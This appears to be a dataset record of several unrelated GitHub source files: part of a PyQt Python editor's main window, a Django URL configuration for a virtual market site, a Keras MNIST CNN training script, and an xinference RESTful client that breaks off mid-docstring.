self.documents_tabWidget.currentWidget()\n if self.ui.find_text_lineEdit.text() == '':\n self.ui.find_text_lineEdit.setText(current_doc.editor.selectedText())\n\n if self.ui.replace_text_lineEdit.text() != '':\n if current_doc is not None:\n current_doc.replace_text(self.ui.find_text_lineEdit.text(),\n self.ui.replace_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_wrap_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked())\n\n def replace_all_in_file(self):\n if self.ui.replace_text_lineEdit.text() != '':\n current_doc = self.documents_tabWidget.currentWidget()\n if current_doc is not None:\n i = current_doc.replace_all_text(self.ui.find_text_lineEdit.text(),\n self.ui.replace_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked())\n self.ui.statusbar.showMessage(self.tr('Replaced {0} instances').format(i), 5000)\n\n def update_tab_title(self):\n idx = self.documents_tabWidget.currentIndex()\n tab = self.documents_tabWidget.widget(idx)\n tabname = tab.filename if tab.saved else tab.filename + ' *'\n self.documents_tabWidget.setTabText(idx, tabname)\n\n def update_cursor_position(self, line, idx):\n \"\"\"\n Process cursor position changes from editors for display in statusbar.\n\n :param int line:\n :param int idx:\n :return:\n \"\"\"\n self.lbl_current_position.setText('{0}:{1}'.format(line+1, idx+1)) # zero indexed\n\n def set_current_run_command(self, tab):\n # set the run script command\n if PLATFORM == 'win32':\n command = '{0} \"{1}\" '.format(self.current_interpreter, tab.filepath)\n else:\n command = '{0} {1} '.format(self.current_interpreter, tab.filepath)\n self.ui.runScript_command.setText(command)\n self.ui.runScript_command.setToolTip(command)\n self.runscript_tab = tab\n\n def handle_tab_change(self, idx):\n if idx >= 0:\n tab = self.documents_tabWidget.widget(idx)\n self.lbl_encoding.setText('{0}'.format(tab.encoding.upper()\n if 'utf' or 'ascii' in tab.encoding.lower()\n else tab.encoding))\n\n if self.ui.run_remember_checkBox.checkState():\n # don't update run command if checked\n return\n else:\n self.set_current_run_command(tab)\n else:\n self.ui.runScript_command.setText('')\n self.runscript_tab = None\n\n def handle_run_remember(self, chk_state):\n if not chk_state:\n tab = self.documents_tabWidget.currentWidget()\n if tab:\n # set the run script command\n if PLATFORM == 'win32':\n command = '{0} \"{1}\" '.format(self.current_interpreter, tab.filepath)\n else:\n command = '{0} {1} '.format(self.current_interpreter, tab.filepath)\n self.ui.runScript_command.setText(command)\n self.ui.runScript_command.setToolTip(command)\n else:\n self.ui.runScript_command.setText('')\n\n def handle_find_wrapped(self):\n self.ui.statusbar.showMessage(self.tr('Find wrapped end of file'), 2000)\n\n def load_anchor(self, url):\n \"\"\"\n Processes URLs for specific actions internal to the application or loads the URLs in the system\n web browser.\n\n :param QtCore.QUrl url:\n The URL to process, it may have schemes beyond http(s)\n :return bool:\n Whether the function handled the signal or not\n\n URLs may have schemes beyond http(s) that the application recognizes and processes for display by the\n built-in browser widget. They follow the standard format {scheme}://{query} where query is a standard URL\n query (?item1=var1&item2=var2)\n Schemes:\n - help: load current interpreter's documentation for a specific Python object, often used to link to error\n documentation in the console tracebacks\n - Query items:\n - object: the Python object to get docstring\n - text: the full text that caused the link to the object (often an error), this is loaded in to the\n help search line widget\n - goto: load a file in to an editor tab and move the cursor to the beginning of a specific line, often used to\n show the user where in a file and error was raised in the console tracebacks\n - Query items:\n - filepath: the full path to the file to load\n - linenum: the line number to move the cursor to\n - http(s): load the full URL in the system browser\n \"\"\"\n scheme = url.scheme()\n ret = False\n if scheme == 'help':\n query = dict(url.queryItems()) # queryItems returns list of tuples\n src = QtCore.QUrl('http://{0}:{1}/'.format(CONSOLE_HOST,\n CONSOLE_HELP_PORT))\n if self.pyconsole_pyversion[0] == 2:\n if query['object'] in py2_exceptions:\n src = QtCore.QUrl('http://{0}:{1}/exceptions.html#{2}'.format(CONSOLE_HOST,\n CONSOLE_HELP_PORT,\n query['object']))\n elif self.pyconsole_pyversion[0] == 3:\n if query['object'] in py3_exceptions:\n src = QtCore.QUrl('http://{0}:{1}/builtins.html#{2}'.format(CONSOLE_HOST,\n CONSOLE_HELP_PORT,\n query['object']))\n try:\n self.ui.helpBrowser.setUrl(src)\n self.ui.helpSearch.setText(urllib.parse.unquote_plus(query['text']))\n self.ui.helpPane.show()\n ret = True\n except UnboundLocalError:\n ret = False\n elif scheme == 'goto':\n query = dict(url.queryItems()) # queryItems returns list of tuples\n filepath = urllib.parse.unquote_plus(query['filepath'])\n linenum = int(query['linenum']) - 1\n found = False\n # Is the file already open?\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n # Take care of slash discrepancies, ahem Windows\n if os.path.normcase(tab.filepath) == os.path.normcase(filepath):\n self.documents_tabWidget.setCurrentWidget(tab)\n tab.editor.setCursorPosition(linenum, 0)\n tab.editor.ensureLineVisible(linenum)\n tab.editor.setFocus()\n found = True\n break\n if not found:\n # Load the offending file in another editor\n try:\n tab = self.open_filepath(filepath)\n tab.editor.setCursorPosition(linenum, 0)\n tab.editor.ensureLineVisible(linenum)\n tab.editor.setFocus()\n except AttributeError:\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(self.tr('File Error'))\n message_box.setText(self.tr('Cannot open file'))\n message_box.setInformativeText(self.tr('The file at {0} cannot be opened.').format(filepath))\n ok_btn = message_box.addButton(QtGui.QMessageBox.Ok)\n message_box.setDefaultButton(ok_btn)\n message_box.exec_()\n ret = True\n elif scheme == 'http' or scheme == 'https':\n # Open URL in system browser\n ret = QtGui.QDesktopServices.openUrl(url)\n\n if not ret:\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(self.tr('Link Error'))\n message_box.setText(self.tr('Cannot open link'))\n message_box.setInformativeText(self.tr('The link at {0} cannot be opened.').format(url.path()))\n ok_btn = message_box.addButton(QtGui.QMessageBox.Ok)\n message_box.setDefaultButton(ok_btn)\n message_box.exec_()\n\n def run_web_search(self):\n \"\"\"\n Combine the search text from the search input with the current web search template and open it with the system\n browser.\n\n :return:\n \"\"\"\n query = self.ui.helpSearch.text()\n url = self.search_url.format(query=urllib.parse.quote_plus(query))\n qurl = QtCore.QUrl(url)\n QtGui.QDesktopServices.openUrl(qurl)\n\n def print_data_to_pyconsole(self, data, fmt, html=False):\n cursor = self.pyconsole_output.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n if html:\n cursor.insertHtml(data)\n else:\n cursor.insertText(data, fmt)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.pyconsole_output.ensureCursorVisible()\n\n def print_data_to_runconsole(self, data, fmt, html=False):\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n if html:\n cursor.insertHtml(data)\n else:\n cursor.insertText(data, fmt)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_stderr_lines(self, lines, cursor):\n \"\"\"\n Process lines from a Python interpreter stderr. For tracebacks additional information is added.\n\n :param list lines:\n :param QtGui.QTextCursor cursor:\n :return:\n\n Lines from stderr often contain traceback data. This function processes those lines and adds additional\n information to help the user troubleshoot. For example links are created to error documentation and to lines\n in source files where errors were raised. The output is entered on the text cursor provided by `cursor`.\n \"\"\"\n for line in lines:\n line = line + os.linesep # Line separators were stripped off in the split, add them back\n ll = line.lower()\n ls = line.strip()\n lsl = ls.lower()\n if 'error' in ll and ll[0] != ' ':\n # Information lines start with whitespace so they're not processed here\n m = CONSOLE_RE_ERROR.search(line)\n if m:\n groups = m.groups()\n error = groups[0]\n try:\n desc = line.split(error)\n link = '{2}'.format(error,\n urllib.parse.quote_plus(ls),\n error)\n if len(desc) > 1:\n cursor.insertText(desc[0], self.error_format)\n cursor.insertHtml(link)\n cursor.insertText(''.join(desc[1:]), self.error_format)\n else:\n cursor.insertHtml(link)\n cursor.insertText(''.join(desc), self.error_format)\n cursor.insertText(os.linesep, self.base_format)\n except ValueError:\n cursor.insertText(line, self.error_format)\n else:\n cursor.insertText(line, self.error_format)\n elif 'file' in lsl:\n m = CONSOLE_RE_LINENUM.search(line)\n if m:\n groups = m.groups()\n filepath = groups[1]\n linenum = groups[3]\n url_filepath = urllib.parse.quote_plus(filepath[1:-1]) # Strip leading and trailing quotes\n if 'stdin' in filepath:\n cursor.insertText(line, self.error_format)\n else:\n link = '{2} '.format(url_filepath,\n int(linenum),\n filepath)\n cursor.insertText(groups[0], self.error_format)\n cursor.insertHtml(link)\n cursor.insertText(''.join(groups[2:]), self.error_format)\n else:\n cursor.insertText(line, self.error_format)\n elif CONSOLE_PS1 in line:\n cursor.insertText(ls + ' ', self.base_format)\n elif CONSOLE_PS2 in line:\n cursor.insertText(ls + ' ', self.base_format)\n else:\n cursor.insertText(line, self.error_format)\n\n def process_console_stdout(self):\n self.pyconsole_process.setReadChannel(QtCore.QProcess.StandardOutput)\n data = self.pyconsole_process.readAll()\n lines = data.data().decode().split(os.linesep)\n for line in lines:\n line = line + os.linesep # Line separators were stripped off in the split, add them back\n # Create clickable links\n m = CONSOLE_RE_HTTP.findall(line)\n if m:\n linked = line\n for g in m:\n linked = linked.replace(g, '{0}'.format(g))\n self.print_data_to_pyconsole(linked, self.base_format, html=True)\n self.print_data_to_pyconsole(os.linesep, self.base_format)\n else:\n self.print_data_to_pyconsole(line, self.base_format)\n\n def process_console_stderr(self):\n self.pyconsole_process.setReadChannel(QtCore.QProcess.StandardError)\n data = self.pyconsole_process.readAll()\n lines = data.data().decode().split(os.linesep)\n cursor = self.pyconsole_output.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n self.process_stderr_lines(lines, cursor)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.pyconsole_output.ensureCursorVisible()\n\n # Get the version of Python running on the console\n if self.pyconsole_pyversion is None:\n banner = self.pyconsole_output.toPlainText().split(os.linesep)[0]\n match = CONSOLE_RE_PYVER.search(banner)\n if match:\n self.pyconsole_pyversion = (int(match.group(1)), int(match.group(2)), int(match.group(3)))\n self.lbl_pyversion.setText('Python {0}.{1}.{2}'.format(*self.pyconsole_pyversion))\n\n def process_console_finished(self, code):\n self.pyconsole_output.insertPlainText(os.linesep)\n self.pyconsole_output.insertPlainText(self.tr('Exited with code {0}').format(code))\n self.runscript_console.ensureCursorVisible()\n self.pyconsole_process.close()\n\n def process_runscript_stdout(self):\n self.runscript_process.setReadChannel(QtCore.QProcess.StandardOutput)\n data = self.runscript_process.readAll()\n lines = data.data().decode().split(os.linesep)\n for line in lines:\n line = line + os.linesep # Line separators were stripped off in the split, add them back\n m = CONSOLE_RE_HTTP.findall(line)\n if m:\n linked = line\n for g in m:\n linked = linked.replace(g, '{0}'.format(g))\n self.print_data_to_runconsole(linked, self.base_format, html=True)\n self.print_data_to_runconsole(os.linesep, self.base_format)\n else:\n self.print_data_to_runconsole(line, self.base_format)\n\n def process_runscript_stderr(self):\n self.runscript_process.setReadChannel(QtCore.QProcess.StandardError)\n data = self.runscript_process.readAll()\n lines = data.data().decode().split(os.linesep)\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n self.process_stderr_lines(lines, cursor)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_runscript_finished(self, code):\n self.print_data_to_runconsole(os.linesep, self.info_format)\n self.print_data_to_runconsole(self.tr('Exited with code {0}').format(code), self.info_format)\n self.runscript_process.close()\n\n def process_help_stdout(self):\n self.help_process.setReadChannel(QtCore.QProcess.StandardOutput)\n data = self.help_process.readAll()\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(data.data().decode(), self.info_format)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_help_stderr(self):\n self.help_process.setReadChannel(QtCore.QProcess.StandardError)\n data = self.help_process.readAll()\n lines = data.data().decode().split(os.linesep)\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n self.process_stderr_lines(lines, cursor)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_help_finished(self, code):\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(os.linesep, self.info_format)\n cursor.insertText(self.tr('HELP: Exited with code {0}').format(code), self.info_format)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n self.help_process.close()\n\n def _save_tab_dialog(self, tab):\n \"\"\"\n Document in tab has not been saved does the user want to save it before deleting\n :param tab:\n :return bool: whether the tab should be deleted\n \"\"\"\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(tab.filename)\n message_box.setText(self.tr('Do you want to save changes to {0} before closing?'.format(tab.filename)))\n message_box.setInformativeText(tab.filepath)\n save_btn = message_box.addButton(QtGui.QMessageBox.Save)\n message_box.addButton(QtGui.QMessageBox.Discard)\n message_box.addButton(QtGui.QMessageBox.Cancel)\n message_box.setDefaultButton(save_btn)\n res = message_box.exec_()\n if res == QtGui.QMessageBox.Save:\n tab.save()\n return True\n elif res == QtGui.QMessageBox.Discard:\n return True\n else:\n return False\n\n @staticmethod\n def _elide_filepath(path, threshold=20, margin=5):\n \"\"\"\n Shorten a file path string using '...' for easier display\n :param str path:\n The file path to shorten\n :param int threshold:\n Paths with lengths less than then will not be shortened\n :param int margin:\n This many characters will be kept before and after the '...'\n :return str:\n \"\"\"\n basepath, filename = os.path.split(path)\n if len(basepath) > threshold:\n return '{0}...{1}{sep}{2}'.format(basepath[:margin], basepath[-margin:], filename, sep=os.sep)\n else:\n return path\n","repo_name":"akehrer/fiddle","sub_path":"fiddle/controllers/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":49262,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"71"} +{"seq_id":"19193582203","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom .views import index, productos, nosotros, contacto, inicio_sesion, carrito, regis_clien_em, regis_clien_per, regis_prod, regis_transp, regis_transp2, perfil_cli_datos, perfil_cli_domici, perfil_cli_pedi, perfil_pro_datos, perfil_pro_domici,perfil_pro_envios,perfil_pro_pedi, perfil_pro_productos, perfil_transp_datos, perfil_transp_domici, perfil_transp_pedi, perfil_transp_transpor, perfil_transp_vehi, subasta, detalle_producto, cerrar_sesion, regiones_por_pais, comunas_por_region, modelo_por_marca\nfrom .views import mercado_pago, success_view\nurlpatterns = [\n path('',index, name='INDEX'),\n path('productos/', productos, name='PRODUCTOS'),\n path('nosotros/', nosotros, name='NOSOTROS'),\n path('contacto/', contacto, name='CONTACTO'),\n path('inicio_sesion/', inicio_sesion, name='INICIO_SESION'),\n path('carrito/', carrito, name='CARRITO'),\n path('regis_clien_em', regis_clien_em, name='REGIS_EMPRESA'),\n path('regis_clien_per', regis_clien_per, name='REGIS_PERSONA'),\n path('regis_prod', regis_prod, name='REGIS_PROD'),\n path('regis_transp', regis_transp, name='REGIS_TRANSP'),\n path('regis_transp2', regis_transp2, name='REGIS_TRANSP2'),\n path('perfil_cli_datos', perfil_cli_datos, name='CLIENTE_DATOS'),\n path('perfil_cli_domici', perfil_cli_domici, name='CLIENTE_DOMICI'),\n path('perfil_cli_pedi', perfil_cli_pedi, name='CLIENTE_PEDI'),\n path('perfil_pro_datos', perfil_pro_datos, name='PROD_DATOS'),\n path('perfil_pro_domici', perfil_pro_domici, name='PROD_DOMICI'),\n path('perfil_pro_envios', perfil_pro_envios, name='PROD_ENVIOS'),\n path('perfil_pro_pedi', perfil_pro_pedi, name='PROD_PEDI'),\n path('perfil_pro_productos', perfil_pro_productos, name='PROD_PRODUC'),\n path('perfil_transp_datos', perfil_transp_datos, name='TRANSP_DATOS'),\n path('perfil_transp_domici', perfil_transp_domici, name='TRANSP_DOMICI'),\n path('perfil_transp_pedi', perfil_transp_pedi, name='TRANSP_PEDI'),\n path('perfil_transp_transpor', perfil_transp_transpor, name='TRANSP_TRANSPOR'),\n path('perfil_transp_vehi', perfil_transp_vehi, name='TRANSP_VEHI'),\n path('subasta', subasta, name='SUBASTAS'),\n path('detalle_producto////', detalle_producto, name='DETALLE_PRODUCTO'),\n path('cerrar_sesion/', cerrar_sesion, name='CERRAR_SESION'),\n path('regiones/', regiones_por_pais, name='REGIONES'),\n path('comunas/', comunas_por_region, name='COMUNAS'),\n path('modelos/', modelo_por_marca, name='MODELOS'),\n path('mercado_pago///', mercado_pago, name='MERCADO_PAGO'),\n path('mercado_pago///success/', success_view, name='success')\n \n]\n","repo_name":"Jotap-ux/FERIA-VIRTUAL-DJANGO","sub_path":"FeriaVirtual/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73296184869","text":"'''Trains a simple convnet on the MNIST dataset.\n\nGets to 99.25% test accuracy after 12 epochs\n(there is still a lot of margin for parameter tuning).\n16 seconds per epoch on a GRID K520 GPU.\n'''\n\nimport numpy as np\nimport pandas as pd\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.utils import np_utils\nfrom keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D, GlobalAveragePooling2D\nfrom keras.layers.advanced_activations import LeakyReLU \nfrom keras.preprocessing.image import ImageDataGenerator\n\nbatch_size = 128\nnum_classes = 10\nepochs = 5\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\nx_test /= 255\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\ny_train = np_utils.to_categorical(y_train, num_classes)\ny_test = np_utils.to_categorical(y_test, num_classes)\n\n# Three steps to Convolution\n# 1. Convolution\n# 2. Activation\n# 3. Polling\n# Repeat Steps 1,2,3 for adding more hidden layers\n\n# 4. After that make a fully connected network\n# This fully connected network gives ability to the CNN\n# to classify the samples\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), input_shape=(28,28,1)))\nmodel.add(Activation('relu'))\nBatchNormalization(axis=-1)\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nBatchNormalization(axis=-1)\nmodel.add(Conv2D(64,(3, 3)))\nmodel.add(Activation('relu'))\nBatchNormalization(axis=-1)\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Flatten())\n# Fully connected layer\n\nBatchNormalization()\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nBatchNormalization()\nmodel.add(Dropout(0.2))\nmodel.add(Dense(10))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(), metrics=['accuracy'])\n\ngen = ImageDataGenerator(rotation_range=8, width_shift_range=0.08, shear_range=0.3, height_shift_range=0.08, zoom_range=0.08)\n\ntest_gen = ImageDataGenerator()\n\ntrain_generator = gen.flow(x_train, y_train, batch_size=64)\ntest_generator = test_gen.flow(x_test, y_test, batch_size=64)\n\nmodel.fit_generator(train_generator, steps_per_epoch=60000//64, epochs=epochs, validation_data=test_generator, validation_steps=10000//64)\nscore = model.evaluate(x_test, y_test, verbose=0)\nmodel.save('cnn2.h5')\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n","repo_name":"Djdcann/EAIProject","sub_path":"train/mnist2.py","file_name":"mnist2.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27538457347","text":"import uuid\nfrom typing import TYPE_CHECKING, Any, Dict, Iterator, List, Optional, Union\n\nimport requests\n\nfrom ..common import chat_streaming_response_iterator, streaming_response_iterator\n\nif TYPE_CHECKING:\n from ...types import (\n ChatCompletion,\n ChatCompletionChunk,\n ChatCompletionMessage,\n ChatglmCppGenerateConfig,\n Completion,\n CompletionChunk,\n Embedding,\n ImageList,\n LlamaCppGenerateConfig,\n PytorchGenerateConfig,\n )\n\n\nclass RESTfulModelHandle:\n \"\"\"\n A sync model interface (for RESTful client) which provides type hints that makes it much easier to use xinference\n programmatically.\n \"\"\"\n\n def __init__(self, model_uid: str, base_url: str):\n self._model_uid = model_uid\n self._base_url = base_url\n\n\nclass RESTfulEmbeddingModelHandle(RESTfulModelHandle):\n def create_embedding(self, input: Union[str, List[str]]) -> \"Embedding\":\n \"\"\"\n Create an Embedding from user input via RESTful APIs.\n\n Parameters\n ----------\n input: Union[str, List[str]]\n Input text to embed, encoded as a string or array of tokens.\n To embed multiple inputs in a single request, pass an array of strings or array of token arrays.\n\n Returns\n -------\n Embedding\n The resulted Embedding vector that can be easily consumed by machine learning models and algorithms.\n\n Raises\n ------\n RuntimeError\n Report the failure of embeddings and provide the error message.\n\n \"\"\"\n url = f\"{self._base_url}/v1/embeddings\"\n request_body = {\"model\": self._model_uid, \"input\": input}\n response = requests.post(url, json=request_body)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to create the embeddings, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulImageModelHandle(RESTfulModelHandle):\n def text_to_image(\n self,\n prompt: str,\n n: int = 1,\n size: str = \"1024*1024\",\n response_format: str = \"url\",\n ) -> \"ImageList\":\n \"\"\"\n Creates an image by the input text.\n\n Parameters\n ----------\n prompt (`str` or `List[str]`, *optional*):\n The prompt or prompts to guide image generation. If not defined, you need to pass `prompt_embeds`.\n n (`int`, *optional*, defaults to 1):\n The number of images to generate per prompt. Must be between 1 and 10.\n size (`str`, *optional*, defaults to `1024*1024`):\n The width*height in pixels of the generated image. Must be one of 256x256, 512x512, or 1024x1024.\n response_format (`str`, *optional*, defaults to `url`):\n The format in which the generated images are returned. Must be one of url or b64_json.\n Returns\n -------\n ImageList\n A list of image objects.\n \"\"\"\n url = f\"{self._base_url}/v1/images/generations\"\n request_body = {\n \"model\": self._model_uid,\n \"prompt\": prompt,\n \"n\": n,\n \"size\": size,\n \"response_format\": response_format,\n }\n response = requests.post(url, json=request_body)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to create the images, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulGenerateModelHandle(RESTfulEmbeddingModelHandle):\n def generate(\n self,\n prompt: str,\n generate_config: Optional[\n Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]\n ] = None,\n ) -> Union[\"Completion\", Iterator[\"CompletionChunk\"]]:\n \"\"\"\n Creates a completion for the provided prompt and parameters via RESTful APIs.\n\n Parameters\n ----------\n prompt: str\n The user's message or user's input.\n generate_config: Optional[Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]]\n Additional configuration for the chat generation.\n \"LlamaCppGenerateConfig\" -> Configuration for ggml model\n \"PytorchGenerateConfig\" -> Configuration for pytorch model\n\n Returns\n -------\n Union[\"Completion\", Iterator[\"CompletionChunk\"]]\n Stream is a parameter in generate_config.\n When stream is set to True, the function will return Iterator[\"CompletionChunk\"].\n When stream is set to False, the function will return \"Completion\".\n\n Raises\n ------\n RuntimeError\n Fail to generate the completion from the server. Detailed information provided in error message.\n\n \"\"\"\n\n url = f\"{self._base_url}/v1/completions\"\n\n request_body: Dict[str, Any] = {\"model\": self._model_uid, \"prompt\": prompt}\n if generate_config is not None:\n for key, value in generate_config.items():\n request_body[key] = value\n\n stream = bool(generate_config and generate_config.get(\"stream\"))\n\n response = requests.post(url, json=request_body, stream=stream)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to generate completion, detail: {response.json()['detail']}\"\n )\n\n if stream:\n return streaming_response_iterator(response.iter_content(chunk_size=None))\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulChatModelHandle(RESTfulGenerateModelHandle):\n def chat(\n self,\n prompt: str,\n system_prompt: Optional[str] = None,\n chat_history: Optional[List[\"ChatCompletionMessage\"]] = None,\n generate_config: Optional[\n Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]\n ] = None,\n ) -> Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]:\n \"\"\"\n Given a list of messages comprising a conversation, the model will return a response via RESTful APIs.\n\n Parameters\n ----------\n prompt: str\n The user's input.\n system_prompt: Optional[str]\n The system context provide to Model prior to any chats.\n chat_history: Optional[List[\"ChatCompletionMessage\"]]\n A list of messages comprising the conversation so far.\n generate_config: Optional[Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]]\n Additional configuration for the chat generation.\n \"LlamaCppGenerateConfig\" -> configuration for ggml model\n \"PytorchGenerateConfig\" -> configuration for pytorch model\n\n Returns\n -------\n Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]\n Stream is a parameter in generate_config.\n When stream is set to True, the function will return Iterator[\"ChatCompletionChunk\"].\n When stream is set to False, the function will return \"ChatCompletion\".\n\n Raises\n ------\n RuntimeError\n Report the failure to generate the chat from the server. Detailed information provided in error message.\n\n \"\"\"\n\n url = f\"{self._base_url}/v1/chat/completions\"\n\n if chat_history is None:\n chat_history = []\n\n if chat_history and chat_history[0][\"role\"] == \"system\":\n if system_prompt is not None:\n chat_history[0][\"content\"] = system_prompt\n\n else:\n if system_prompt is not None:\n chat_history.insert(0, {\"role\": \"system\", \"content\": system_prompt})\n\n chat_history.append({\"role\": \"user\", \"content\": prompt})\n\n request_body: Dict[str, Any] = {\n \"model\": self._model_uid,\n \"messages\": chat_history,\n }\n if generate_config is not None:\n for key, value in generate_config.items():\n request_body[key] = value\n\n stream = bool(generate_config and generate_config.get(\"stream\"))\n response = requests.post(url, json=request_body, stream=stream)\n\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to generate chat completion, detail: {response.json()['detail']}\"\n )\n\n if stream:\n return chat_streaming_response_iterator(\n response.iter_content(chunk_size=None)\n )\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulChatglmCppChatModelHandle(RESTfulEmbeddingModelHandle):\n def chat(\n self,\n prompt: str,\n chat_history: Optional[List[\"ChatCompletionMessage\"]] = None,\n generate_config: Optional[\"ChatglmCppGenerateConfig\"] = None,\n ) -> Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]:\n \"\"\"\n Given a list of messages comprising a conversation, the ChatGLM model will return a response via RESTful APIs.\n\n Parameters\n ----------\n prompt: str\n The user's input.\n chat_history: Optional[List[\"ChatCompletionMessage\"]]\n A list of messages comprising the conversation so far.\n generate_config: Optional[\"ChatglmCppGenerateConfig\"]\n Additional configuration for ChatGLM chat generation.\n\n Returns\n -------\n Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]\n Stream is a parameter in generate_config.\n When stream is set to True, the function will return Iterator[\"ChatCompletionChunk\"].\n When stream is set to False, the function will return \"ChatCompletion\".\n\n Raises\n ------\n RuntimeError\n Report the failure to generate the chat from the server. Detailed information provided in error message.\n\n \"\"\"\n\n url = f\"{self._base_url}/v1/chat/completions\"\n\n if chat_history is None:\n chat_history = []\n\n chat_history.append({\"role\": \"user\", \"content\": prompt})\n\n request_body: Dict[str, Any] = {\n \"model\": self._model_uid,\n \"messages\": chat_history,\n }\n\n if generate_config is not None:\n for key, value in generate_config.items():\n request_body[key] = value\n\n stream = bool(generate_config and generate_config.get(\"stream\"))\n response = requests.post(url, json=request_body, stream=stream)\n\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to generate chat completion, detail: {response.json()['detail']}\"\n )\n\n if stream:\n return chat_streaming_response_iterator(\n response.iter_content(chunk_size=None)\n )\n\n response_data = response.json()\n return response_data\n\n\nclass Client:\n def __init__(self, base_url):\n self.base_url = base_url\n\n @classmethod\n def _gen_model_uid(cls) -> str:\n # generate a time-based uuid.\n return str(uuid.uuid1())\n\n def list_models(self) -> Dict[str, Dict[str, Any]]:\n \"\"\"\n Retrieve the model specifications from the Server.\n\n Returns\n -------\n Dict[str, Dict[str, Any]]\n The collection of model specifications with their names on the server.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models\"\n\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to list model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def launch_model(\n self,\n model_name: str,\n model_type: str = \"LLM\",\n model_uid: Optional[str] = None,\n model_size_in_billions: Optional[int] = None,\n model_format: Optional[str] = None,\n quantization: Optional[str] = None,\n replica: int = 1,\n n_gpu: Optional[Union[int, str]] = \"auto\",\n **kwargs,\n ) -> str:\n \"\"\"\n Launch the model based on the parameters on the server via RESTful APIs.\n\n Parameters\n ----------\n model_name: str\n The name of model.\n model_type: str\n type of model.\n model_uid: str\n UID of model, auto generate a UUID if is None.\n model_size_in_billions: Optional[int]\n The size (in billions) of the model.\n model_format: Optional[str]\n The format of the model.\n quantization: Optional[str]\n The quantization of model.\n replica: Optional[int]\n The replica of model, default is 1.\n n_gpu: Optional[Union[int, str]],\n The number of GPUs used by the model, default is 